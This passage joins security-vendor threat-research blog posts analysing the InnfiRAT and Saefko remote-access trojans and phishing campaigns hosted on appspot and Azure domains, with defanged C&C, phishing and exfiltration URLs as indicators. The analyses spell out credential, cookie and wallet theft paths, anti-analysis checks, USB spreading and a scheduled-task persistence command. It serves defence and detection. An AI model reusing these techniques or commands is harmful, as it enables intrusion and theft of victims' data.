enables it to bypass many automatic analysis engines and extend its survival. The following screenshots show the code and the location where the user credentials are being sent. This code is present in randomly named, externally added JavaScript files. Fig 13: Location used by the attacker to collect user credentials  Fig 14: Location used by the attacker to collect user credentials The following figure shows a sample packet capture for this data being sent to the attacker’s site.  Fig 15: Packet capture for the data that has been sent to the attacker’s site   Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages: Fig 16: Zscaler successfully detects these domains    Phishing domains As of the writing of this blog, we have collected the following phishing domains. uy67dass[.]appspot[.]com ja8fspxzosaa[.]appspot[.]com gjf9pxzosa[.]appspot[.]com egoew023pzas[.]appspot[.]com vhkad03pas[.]appspot[.]com kda8gazxa[.]appspot[.]com adgkao93pz[.]appspot[.]com l9rwpodsxcs[.]appspot[.]com cvgfsaz[.]appspot[.]com jga9spzas[.]appspot[.]com jjad9gdpxzsa[.]appspot[.]com vadgka932oa[.]appspot[.]com ls9ixosdsasa[.]appspot[.]com qwsa92oozxa[.]appspot[.]com adlg402ooz[.]appspot[.]com bnb932psiz[.]appspot[.]com authofisaiz[.]web[.]app Telecomm-uk[.]web[.]app f45ghdsas[.]appspot[.]com Derr9qepzxas[.]appspot[.]com Vgdikad9oqww[.]appspot[.]com dsa3aszxsa[.]appspot[.]com weotwe0dpa[.]appspot[.]com Wy6fxsa[.]appspot[.]com Yu56sdzsa[.]appspot[.]com Vbhg45as[.]appspot[.]com Hds9pzoas[.]appspot[.]com khs9dpas[.]appspot[.]com u76dfsdasa[.]appspot[.]com y56fds[.]appspot[.]com vfhgj3sz[.]appspot[.]com eyq246ddpoas[.]appspot[.]com h45dsagga[.]appspot[.]com sds43dza[.]appspot[.]com yt76uyhxzz[.]appspot[.]com jh54dfaz[.]appspot[.]com ytyfazxz[.]appspot[.]com   Where information is sent  Below are the locations where the phishing page is sending credentials entered by the user.  https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]php https://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php https://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php https://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]php https://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php  

Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.   Background As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has ScreenShot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.   InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.   Technical analysis 1) Before executing the main payload, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. If not, then a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity). 2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for an exit.   Figure 1: Checks execution location, terminates process with name NvidiaDriver            3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.                Figure 2: The malware makes a copy of itself in %AppData%    4) After confirming the path of file execution, it writes a Base64 encoded PE file in memory, which is later decoded in its actual format and is loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.   Figure 3: Embedded PE file in encoded form   Figure 4: Embedded PE file is decoded and executed Analysis of embedded .NET executable All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation. Figure 5: Strings decoding logic   As the execution of the malware starts, it checks for the presence of VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, then it continues the execution or else it terminates.   Figure 6: User-defined enum structure   After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168(). Anti-VM checks Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine: Note: All the enum values are referenced using enum[index] during analysis where the index starts from 0. 1. Performs WMIquery to obtain the following information: "Manufacturer" "Caption" "Name" "ProcessorId" "NumberOfCores" "NumberOfLogicalProcessors" "L2CacheSize" "L3CacheSize" "SocketDesignation" It then checks, one-by-one, if the manufacturer contains one of the below-mentioned strings and returns the value from the enum as specified: “VBoxVBoxVBox”                   returns enum[2] “VMwareVMware”                  returns enum[1] “Prl hyperv                               returns enum[3] “Microsoft Corporation”        returns enum[4] 2. WMIquery is performed again but this time to obtain the following information: "DeviceID" "MediaType" "Model" "PNPDeviceID" "SerialNumber" A check is performed if the PnpDeviceId contains one of the below strings and returns the value from the enum as specified: “VBOX_HARDDISK”             returns enum[2] “VEN_VMWARE”                  returns enum[1] If none of the above conditions match, it returns enum[0].   Machine network information Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine: A web request is sent to the following URL https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following information:   "ip"   "city"   "region"   "country"   "loc"   "postal"   "org"   Figure 7: Web request being made   Network communication   Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine: InnfiRAT sets up a duplex channel with the name “IVictim” using DuplexChannelFactory tcp://62[.]210[.]142[.]219:17231/IVictim   Figure 8: Creating a duplex channel with C&C server   After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods: “Subscribe” “CompleteTask” “GetDlls” “AvailableTasks”   Figure 9: Available methods in the IVictim interface Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine: InnfiRAT calls the subscriber method from the IVictim interface with login = “innfiniti”   Figure 10: The subscribe method from the IVictim interface is invoked Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine: InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks where UserTask has the following keys: “ID” “Action” “URL” “FinalPoint” “Current”  “Status” “Country” “RunSilent” “Argument” It iterates through each task. On each iteration, it first checks for the country value received to be equal to “ALL” OR  the one present in the BasicInfoVictim class, which was obtained earlier AND the action to perform is "DownAndEx" and the URL value is available.      If the above conditions match, then the CompleteTasks method is called with three arguments:  “login” “hwid” “TaskID”   The RAT calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file. Arg1 = Path of the file to be executed [obtained from the URL] Arg2 = Arguments to the file to be executed [obtained from Argument key of current UserTask element] Arg3 = true/false [Obtained from RunSilent key of current UserTask element] After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.   Figure 11: Country, action, and URL checks are performed and the specified task is completed   Process checks Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine: All the running processes in the system are obtained, their names are converted to lowercase and then a check is performed to see if the name matches with any of the following strings:  “taskmgr” “processhacker” “procmon” “procexp” “pchunter” “procexp64” If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.   Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes   Figure 13: Converting ProcessName to lowercase   Figure 14: Checking for above-mentioned running processes (process names are obfuscated here) Inside wYxйыrоyTHuLдTч212065() [KillProcesses] routine: InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings: “chrome” “browser” “firefox” “opera” “amigo” “kometa” “torch” “orbitum”   Figure 15: Kills processes that contain any of the above-mentioned strings   Scheduled execution Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine: The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like below:  /C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm  /du 9999:59 /sc daily /ri 1 /f   Figure 16: CMD command is constructed and executed   C&C commands Here are some tasks performed by the malware based on the commands received from C&C server: 1. SendUrlAndExecute(string URL) InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside the %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via delimiter ‘/’ and the last item is used as the file name.   Figure 17: Create folder and download file   Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file. Arg1 = Path of the file to be executed Arg2 = Arguments to the file to be executed Arg3 = true   Figure 18: Execute the downloaded file 2. ProfileInfo() Inside the routine, it collects the following information: “NetworkInfo”:{ "ip"  "city" "region" "country" "loc" "postal" "org" } “PCAdmin” “PCInformation” :{ “FrameWorkDescription” “Processors” “PRocessorsCore” “VideoCards” }  It then sends the information to the C&C server. Figure 19: UserProfile info being collected and sent to the C&C server   3. LoadLogs() It calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”,                     represents a relative path to an .exe file “ByteArray”            binary data   Figure 20: GetDlls being called   After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop: The value of the Path key is split using delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file.  The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. Finally, data obtained from UserProfile() is sent to the C&C server.   Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server   4. LoadCookies()  - Steal Browser Cookie information InnfiRAT calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”                    represents a relative path to an .exe file “ByteArray”          binary data   Figure 22: GetDlls being called   After fetching the list, the malware traverses each element inside the list via for-loop. The following occurs inside the for-loop: The value of the Path key is split using the delimiter “\\”. Second, the value in the split is the name of the directory. A check is performed if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by the Path key in the executing module directory. If a check is true, it creates the file and writes the value of ByteArray to this created file.    Figure 23: Directory is created, file is created   It creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths” “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla” A BrowserCook type element is created with the fetched information and is added to the list created earlier.   Figure 24: Browser info is retrieved and added to the list   It creates an empty list of BrowserCookie type where BrowserCookie has three keys, namely:  “Browser” “FileName” “FileArray” Inside, two for-loop elements of the BrowserCookie type are created, where the Browser key and FileArray key are both assigned values using the information from the previously created BrowserCook list and the FileName is set to _Cookie.txt if the browser name for the current element is not “Mozilla”, or else it is set to Cookie.txt.   Figure 25: BrowserCookie elements list is built   The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.   Figure 26: File and directory is deleted 5. LoadWallets() - Steal Bitcoin Wallets The malware creates an empty list of the BitcoinWallet type where BitcoinWallet has two keys, namely: “WalletArray” “WalletName” A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location: Litecoin: %AppData%\Litecoin\wallet.dat Bitcoin: %AppData%\Bitcoin\wallet.dat If it is found, then the element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file in the WalletArray key.   Figure 27: File presence is checked, BitcoinWallet element is added to the list   Finally, the created list is sent in response to the C&C server.   Figure 28: List is sent in response to the C&C server   6. LoadFiles() - Steal small text files potentially containing sensitive information InnfiRAT collects all the .txt files available on the desktop whose size is less than 2,097,152 bytes inside a list of CustomFile types. CustomFile has two keys namely:  “Name”   “FileArray” The created list is sent in response to the C&C server.   Figure 29: Files are collected and sent to the C&C server   Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]   7. LoadProcesses() - Get the list of running processes on the victim machine InnfiRAT creates an empty list of type ProcessInfo where ProcessInfo has three keys, namely: “ID” “Name”  “Path” It obtains the list of all the processes running in the system and sends the list in response to the C&C server.    Figure 31: Process information is obtained and the list is sent to the C&C server   8. Kill(int process) - Command to Kill a specific process on the victim machine InnfiRAT obtains the list of all the processes running in the system and then inside a for-loop, the processID of obtained processes is compared with the processID passed as an argument to this routine one at a time. If there is a match, the process is killed and the flag variable is set to true. Finally, a response is sent to C&C server.   Figure 32: Process is killed and response is sent   9. Screenshot() - Take a screenshot on the victim machine It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.   Figure 33: Screenshot captured and sent to the C&C server   Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine   10. RunCommand(string command) - Execute specified command on the victim machine This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process. Command line argument:   /c  +  “ ” + command   Figure 35: Received command is executed   11. ClearCooks() - Clears browser Cookies on the victim machine for specific Browsers InnfiRAT creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths”  “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla”   A BrowserCook type element is created with the fetched information and is added to the list created earlier. Figure 36: Browser info is retrieved and added to the list   The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. The BrowserCook type list created earlier is traversed and cookies files are deleted using CookiePaths key value. Finally, a response is sent to the C&C server.   Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server Conclusion A RAT, remote-access trojan, is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. They can also be designed to spread to other systems on a network. Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source. The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.   IOCs Md5: f992dd6dbe1e065dff73a20e3d7b1eef Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim

Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.   Background A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the chrome browser history looking for specific types of activities, such as those involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests for further instructions. The C&C instructs the malware to provide system information and the RAT will begin to collect a range of data including screenshot,videos, keystroke logs and more. The C&C can also instruct the malware to download additional payload onto the infected system. RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.   Technical Analysis of the Saefko RAT Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them. Autostart Key The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key: “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Otherwise, it creates a registry key in the following path: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Functionality Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems. The list of different categories it searches include: Credit card possibility paypal.com 2c2p adyen.com volusion.com pay.amazon.com apple.com/apple-pay/ atos.net authorize.net BIPS bitpay.com bpay.com braintreepayments.com centup.org cm.com creditcall.com cybersource.com mastercard.com digi.cash digitalriver.com dwolla.com elavon.com euronetworldwide.com eway.io firstdata.com fortumo.com pay.google.com/send/home heartlandpaymentsystems.com ingenico.com ippayments.com klarna.com emergentpayments.ne moduslink.com mpay.com neteller.com ofx.com pagseguro payoneer.com paymentwall.com paypoint.co paysbuy.com paysafe.com paytm.com payzone.co.uk crunchbase.com qiwi.com globalpaymentsinc.com reddotpayment.com sagellc.com skrill.com stripe.com squareup.com tencent.com transfermate.com transferwise.com wmtransfer.com trustly.com wepay.com verifone.com xendpay.com pay.weixin.qq.com money.yandex.ru wirecard.com truemoney.com xsolla.com myshopify.com/admin payza.com 2checkout.com 3dcart.com paysafecard.com weebly.com       Gaming activity value origin.com steampowered.com g2a.com twitch.tv nichegamer.com techraptor.net gematsu.com estructoid.com pcgamer.com gamefaqs.gamespot.com gamespot.com siliconera.com rockpapershotgun.com gameinformer.com decluttr.com glyde.com gamestop.com microsoft.com/account/xboxlive playstation.com/en-us/network/store nintendo.com/games gog.com game.co.uk itch.io gamefly.com greenmangaming.com gaming.youtube.com     Cryptocurrency value etoro.com 24option.com puatrack.com/coinbull2/ luno.com paxforex.com binance.com coinbase.com cex.io changelly.com coinmama.com xtrade.ae capital.com paxful.com kraken.com poloniex.com gemini.com bithumb.com xcoins.io cobinhood.com coincheck.com coinexchange.io shapeshift.io bitso.com indacoin.com cityindex.co.uk bitbay.net bitstamp.net cryptopia.co.nz pro.coinbase.com kucoin.com bitpanda.com foxbit.com.br bitflyer.com bitfinex.com bit-z.com quadrigacx.com quadrigacx.com big.one lakebtc.com wex.nz kuna.io yobit.io zebpay.com hitbtc.com bx.in.th trezor.io electrum.org blockchain.com crypto.robinhood.com exodus.io mycelium.com bitcointalk.org btc-e.com moonbit.co.in bitcoinaliens.com bitcoinwisdom.com coindesk.com cointelegraph.com ccn.com reddit.com/r/Bitcoin/ bitcoin.org/en/blog newsbtc.com blog.spectrocoin.com blog.coinbase.com bitcoinist.com forklog.com abitcoinc.com bitcoin.stackexchange.com news.bitcoin.com blog.bitfinex.com blog.genesis-mining.com     Instagram activity instagram.com m.instagram.com   Facebook activity facebook.com m.facebook.com   Youtube activity youtube.com m.youtube.com   Google+ activity plus.google.com m.plus.google.com   Gmail activity gmail.com mail.google.com   Shopping activity boohoo.com gymshark.com mail.google.com prettylittlething.com showpo.com athleta.com ae.com ruelala.com asos.com superdry.com zaful.com zafulswimwear.com luckybrand.com forever21.com urbanoutfitters.com nastygal.com jcrew.com anthropologie.com allsaints.com uniqlo.com armaniexchange.com fashionnova.com saksoff5th.com target.com macys.com barneys.com zappos.com sneakersnstuff.com yoox.com nike.com simmi.com amazon.com ebay.com walmart.com newegg.com bestbuy.com ftd.com 1800flowers.com glossier.com sephora.com thebodyshop.com ulta.com horchow.com homedepot.com pier1.com bedbathandbeyond.com wayfair.com shoptiques.com viator.com etsy.com cloud9living.com seatgeek.com aliexpress.com alibaba.com       Business value linkedin.com twitter.com nasdaq.com ft.com reuters.com nyse.com tsx.com marketwatch.com thestreet.com wsj.com investing.com investopedia.com finance.yahoo.com seekingalpha.com fool.com investorguide.com zacks.com home.saxo forexbrokers.com swissquote.com cmcmarkets.com fxpro.co.uk forex.com dukascopy.com interactivebrokers.com tdameritrade.com bankofinternet.com ally.com bankpurely.com redneck.bank       Saefko also collects additional user application data, including: Command Description irc_channel IRC channel name irc_nickname Nickname irc_password IRC channel Password irc_port IRC Port for communication to a server irc_server Server name machine_active_time System uptime machine_artct Machine Architecture machine_bitcoin_value Number of cryptocurrency sites visited by the user machine_business_value Number of business sites visited by the user machine_calls_activity 0 machine_camera_activity No. of “.png” files present on the desktop machine_country_iso_code Country code fetch from “ipinfo.io/geo” machine_lat latitude machine_lng longitude machine_creadit_card_posiblty Checks the number of payment sites visited by the user machine_current_time Taking machine current time machine_facebook_activity Checks the number of times the user visited facebook machine_gaming_value Checks the number of times the user visited gaming websites machine_gmail_avtivity Checks the number of times the user visited gmail machine_googleplus_activity Checks the number of times the user visited google+ machine_instgram_activty Checks the number of times the user visited Instagram machine_ip Machine IP machine_lat The geographic location of the system (latitude) machine_lng The geographic location of the system (longitude) machine_os_type 1 machine_screenshot Captures screenshot and encode it in base 64 machine_shooping_activity Checks number of times shopping sites visit by the user   The RAT sends the collected data to a command and control server as shown below: After getting an "ok" response from the server, Saefko begins the "StartServices" function, which has four different infection modules: HTTPClinet IRCHelper KEYLogger StartLocalServices (USB spreading) HTTP Clinet (Possible misspelling of HTTP Client by the author) The RAT sends a request to the server, requesting for a new task. It sends a command “UpdateAndGetTask” and also sends other information, including machine_ID, machine_os, and privateip, as shown below: The task is the URL from which the malware downloaded the new payload and executed it on the infected machine. Key Logger The malware uses the SetWindowsHookEx API for capturing keystrokes. It stores the captured keystrokes into a “log.txt” file. The filepath is: “\%AppData%\Local\log.txt.” IRC Helper First, the malware disconnects the current IRC connection. Then, it sends status information to the C&C as shown below: pass: password command: UpdateHTTPIRCStatus machine_id: unique id sent by C&C in an earlier request irc_status: 1  Next malware fetch  Serverlist: it selects a server from the list below. Port: port  Nickname: generates a random 7 character name  List of IRC servers and ports IRC server Port IRC server Port irc.afterx.net 6667 irc.cyanide-x.net 6667 chat.freenode.net 6667 irc.europnet.org 6667 irc.azzurra.org 6669 irc.rizon.net 6669 irc.dal.net 6667 irc.efnet.org 6667 irc.gamesurge.net 6667 open.ircnet.net 6669 irc.quakenet.org 6667 irc.swiftirc.net 6667 eu.undernet.org 6667 irc.webchat.org 7000 irc.2600.net 6667 irc.abjects.net 6669 irc.accessirc.net 6667 irc.afternet.org 6667 irc.data.lt 6667 irc.allnetwork.org 6667 irc.alphachat.net 6667 irc.austnet.org 6667 irc.axenet.org 6667 irc.ayochat.or.id 6667 irc.beyondirc.net 6669 irc.blitzed.org 6667 irc.bongster.org 6669 irc.caelestia.net 6667 irc.canternet.org 6667 irc.chatall.org 6669 irc.chatcafe.net 6667 irc.chatspike.net 6667 irc.chatzona.org 6667 irc.criten.net 6667 irc.cyberarmy.net 6667 irc.d-t-net.de 6667 irc.darkmyst.org 6667 irc.deepspace.org 6667 irc.dream-irc.de 6667 irc.drlnet.com 6667 irc.dynastynet.net 6667 irc.echo.com 6667 irc.ecnet.org 6667 irc.enterthegame.com 6667 irc.epiknet.org 6667 irc.esper.net 6667 irc.euirc.net 6669 irc.evolu.net 6667 irc.explosionirc.net 6667 irc.fdfnet.net 6668 irc.fef.net 6667       Saefko connects to one of these servers and waits for a response. In the response, it checks for “T_T” string and any separate messages using that string. Below is the list of IRC functions that the RAT can perform. According to the command it receives, Saefko will respond with corresponding data. List of IRC Commands IRC Command Description dexe Download a file from a given URL and execute it hdexe Download a file from a given URL and execute it (UseShellExecute=false) vistpage Open URL hvistpage Open URL (UseShellExecute = false) snapshot Captures video frame, converts into Base64 and sends to C&C (Detailed information explained below); also replies “.oksnapshot” shell Executes command using cmd.exe tcp Makes a tcp connection using a given IP and port. identify Send system information: OS type: Microsoft windows OS version: OS version OS Username: username OS MachineName: System name OS SystemDirectory: System Directory opencd Open CDROM drive. Command: set CDAudio door open closecd Close CDROM drive. Command: set CDAudio door closed screenshot Capture screenshot, encode it into Base64 and send to C&C ping Reply “okping” camlist Gets the video devices from the system and sends information to the C&C.Detailed information explained below. pwd Current directory location Gets the system location using “https://ipinfo.io/geo” IP, city, region, country, latitude and longitude keylogs Encode the keylog file (log.txt) using base64 and send it to C&C uninstall Delete the autostart registry key (RUN) and terminate itself.   Camlist Saefko also searches for the following payloads in the system: AForge.dll AForge.Video.DirectShow.dll AForge.Video.dll Sqlite3.dll If these files are not present, the malware sends a request to the C&C to download these files. Next, it searches for a list of video input devices on the targeted system and sends the related information to the C&C. Snapshot Saefko also captures videos from the device present on the system, encodes the video frame with Base64 and sends it to the C&C. Start USB Service Saefko checks to see if the drive type is either removable or networked, after which it starts the infection and copies the files below onto a removable drive. Sas.exe USBStart.exe usbspread.vbs Sas.exe is a copy of the malware itself. USBStart.exe is fetched from the resource section of the main binary. It contains code to execute Sas.exe. It creates a usbspread.vbs file then executes it. It searches every directory and all the files and creates a "lnk" file for each file and directory with a target path USBStart.exe file. When the removable device is plugged in any other system, the user is tricked into clicking a lnk file as the main files and folder are hidden. Lnk file executes the USBStart.exe that ends up executing Sas.exe which is the main payload. So it futher infect other Systems. Below is the code of the usbspread.vbs file: One online forum has an ad for a cracked Saefko RAT tool as shown below. It is a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.   Conclusion To protect systems from RATs, users must refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to prevent the malware from doing too much activity at once, which would slow down the system and possibly attract the attention of the user and IT. Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.   IOCs Md5: D9B0ECCCA3AF50E9309489848EB59924 C4825334DA8AA7EA9E81B6CE18F9C15F 952572F16A955745A50AAF703C30437C 4F2607FAEC3CB30DC8C476C7029F9046 7CCCB06681E7D62B2315761DBE3C81F9 5B516EAB606DC3CC35B0494643129058 Downloader URL: industry.aeconex[.]com/receipt-inv.zip 3.121.182[.]157/dwd/explorer.exe 3.121.182[.]157/dwd/vmp.exe deqwrqwer.kl[.]com.ua/ex/explorer.exe maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip Network URL: acpananma[.]com/love/server.php 3.121.182[.]157/smth/server.php f0278951.xsph[.]ru/server.php maprivate[.]date/server.php

Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are signed with a Microsoft SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.  In this blog, we will describe two of the prominent vectors used and we’ll show several examples of the phishing pages. The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud. Fig 1: Phishing hits using the Azure domain web.core.windows.net (green) and blob.core.windows.net (orange)   The following is the Whois lookup information related to the Windows.net domain. Fig 2: Whois lookup info for domain Windows.net domain   For these phishing campaigns, the delivery vector was spam emails. CASE 1: In this case, the attacker sends a spam email to a user, appearing to come from a particular organization and notifying the user that seven emails have been quarantined. It states that in order to review the emails, the user has to log in using the work or school account. Fig 3: Spam email with direct phishing link   If the user clicks the view emails button, it will redirect to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html). Fig 4: Outlook login phishing page   Some users may get confused because of the unknown URL hosting the Outlook login page. To trick those users, the attackers have used the SSL certificate issued by Microsoft as shown below. Fig 5: SSL certificate page of the hosted phishing URL   The following figure depicts the source code of the phishing page, which is used by attackers to collect users’ data. Fig 6: Source code of the phishing URL page   Once the login information has been entered by the user, the form will post the user’s credential details to the compromised domain that is operated by the cybercriminals. Fig 7: Captured data traffic that has been sent to the attacker’s site   CASE 2: In this method, attackers send the spam email with an attached HTML file that looks like a voice message. Once the user clicks the HTML file, it will redirect to the phishing page hosted using the Azure domain. Fig 8: Spam mail with double extension method   Fig 9: Outlook login phishing page redirected from voice message   In this phishing campaign, the attackers have injected obfuscated JavaScript to validate the user credentials that are present in their database to avoid duplication. Fig 10: Obfuscated JavaScript to validate user credentials to avoid duplication   The following figure depicts the deobfuscated JavaScript. This code will validate the user’s credential details and sent it to the attacker’s server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php). Fig 11: Deobfuscated JavaScript Fig 12: User data will be sent to the attacker’s site using the function getValidatorURL().   In addition to the Outlook phishing campaigns, we have seen phishing campaigns associated with these Azure domains: Microsoft Phishing, OneDrive Phishing, Adobe Document Phishing, Blockchain Phishing, and more. The following figure shows the different phishing campaigns that are hosted using the Azure domain (Windows.net). Fig 13: Microsoft login phishing page   Fig 14: Adobe login phishing page   Fig 15: Blockchain login phishing page   Fig 16: OneDrive login phishing page   Conclusion The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud. Fig 17: Detected phishing hits    Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing 